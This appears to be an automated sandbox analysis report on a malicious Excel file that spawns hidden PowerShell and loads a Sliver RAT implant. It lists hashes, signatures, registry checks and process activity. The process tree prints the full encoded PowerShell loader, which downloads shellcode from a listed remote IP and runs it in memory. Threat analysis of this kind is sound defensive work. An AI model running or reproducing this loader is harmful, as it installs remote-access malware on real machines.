Analysis
-
max time kernel
59s -
max time network
72s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 22:07
Behavioral task
behavioral1
Sample
4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad.xls
Resource
win7-20241010-en
General
-
Target
4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad.xls
-
Size
46KB
-
MD5
5f292d4cf9f505eca69bf6ce3905319a
-
SHA1
5b77b73b29c78a54066a4d059ddb1ddd416d7b93
-
SHA256
4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad
-
SHA512
ac71e214369caf1cb43cf0fabfe4268321985f69024a622721f5e359908c9d0ede008f1d0d9d9053689a2d94dd0bd504b9678ca5afab10591c9c506c08b3caa8
-
SSDEEP
768:w4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:7SFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1420 2300 powershell.exe EXCEL.EXE -
Sliver RAT v2 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1420-62-0x000001D65F2D0000-0x000001D65FD4E000-memory.dmp SliverRAT_v2 behavioral2/memory/1420-63-0x000001D6607D0000-0x000001D6612B6000-memory.dmp SliverRAT_v2 behavioral2/memory/1420-64-0x000001D6607D0000-0x000001D6612B6000-memory.dmp SliverRAT_v2 behavioral2/memory/1420-65-0x000001D6607D0000-0x000001D6612B6000-memory.dmp SliverRAT_v2 behavioral2/memory/1420-66-0x000001D6607D0000-0x000001D6612B6000-memory.dmp SliverRAT_v2 behavioral2/memory/1420-70-0x000001D6607D0000-0x000001D6612B6000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 26 IoCs
Processes:
powershell.exeflow pid process 23 1420 powershell.exe 25 1420 powershell.exe 27 1420 powershell.exe 30 1420 powershell.exe 31 1420 powershell.exe 35 1420 powershell.exe 39 1420 powershell.exe 40 1420 powershell.exe 41 1420 powershell.exe 42 1420 powershell.exe 43 1420 powershell.exe 44 1420 powershell.exe 50 1420 powershell.exe 58 1420 powershell.exe 60 1420 powershell.exe 61 1420 powershell.exe 62 1420 powershell.exe 63 1420 powershell.exe 64 1420 powershell.exe 65 1420 powershell.exe 66 1420 powershell.exe 67 1420 powershell.exe 68 1420 powershell.exe 69 1420 powershell.exe 70 1420 powershell.exe 71 1420 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2300 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1420 powershell.exe 1420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1420 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2300 EXCEL.EXE 2300 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE 2300 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid process target process PID 2300 wrote to memory of 1420 2300 EXCEL.EXE powershell.exe PID 2300 wrote to memory of 1420 2300 EXCEL.EXE powershell.exe PID 1420 wrote to memory of 1872 1420 powershell.exe csc.exe PID 1420 wrote to memory of 1872 1420 powershell.exe csc.exe PID 1872 wrote to memory of 1328 1872 csc.exe cvtres.exe PID 1872 wrote to memory of 1328 1872 csc.exe cvtres.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2updqwc\a2updqwc.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBED.tmp" "c:\Users\Admin\AppData\Local\Temp\a2updqwc\CSC5BA012EDF15A4B3A8A78C1A2A08DA99C.TMP"4⤵PID:1328
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c34f3905cb7ee147c0766ec8b762218a
SHA1aef8f8f17ea755f367270dbb8f7bc3917f1d556f
SHA2563bc77c60ca11972ca9aca99ebac04e154bbdcc636f0ae685fcf0c4ff5c054b50
SHA51256e81a4ee35ce4a31968279c2bbe7e371d96edfb5d18e2ce1d690a7f7f5e2b7afe804202f576a509ae7cc205ce6a33ef43672bbdda3b96e7a770f2c46303de88
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5c278943139e085a3c5c69f6e41c3515f
SHA1acbe31d260fd7607a360def8ab36a499fad91b3d
SHA2565fb46a4ee50cd3d29cca45b34bd3705cffc9c5f512d03fba0fefefec144bc4c1
SHA512c046edbcd033c96bc1c0b4cc5ad51130954bf6ea9551d30df01fc2128afb3edb3cc6f1266ef5d519df32262d85268948a774da11d13398c718e06f2562cd5c2a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize2KB
MD5ed35faf226badca23aceac60cc886558
SHA14074f84ab658087344b862e3f0380d74675e2f6d
SHA256869d64b20ca84170bbd185609dda314cc50ee639b6103d601a0e6d4a5d7fb17e
SHA51217c0a4aa33bb1182860012e75d44c38a6c39d1a4be51d9866df250a0209d81a142735a9b994d1e63e3b2bb720b8c59b596d93b5b65fbdcb61d7d7791955776dc
-
Filesize
652B
MD5ba4edf292e7d86e437008cd2ac34cf6b
SHA185f5800d6f42d8b5d170cdc3f2c27fefd772226d
SHA25612569ff0944b87846f4e72f41caa0bcfd1deb6d412c69ef650f09d0f3f2c0e77
SHA5126354e95900dd622d8a5057de34d80f963246d6ccfa8b560f13769231649ddb0435632b8ffec957ae29546d01f30d58f7b508c5b2d5ad192b720ffa659db58fad
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD5a56821207d1dfb3197acef68c7f2fb26
SHA152f48e25c1047a1d7d85808bd0caeb754a0a69b9
SHA25693c3f81ea45784c413e198db0ff1fd86a4147fb5b1c2ca9a7e63b73465d1e1bf
SHA512b4826d6e169365bd82a5033654173eb1216fff2229d3e841e4d72b4f964064ecaf5ad5a80f75242d958a96960f73b49af85e2ab7360f38f894ef2c62064a9282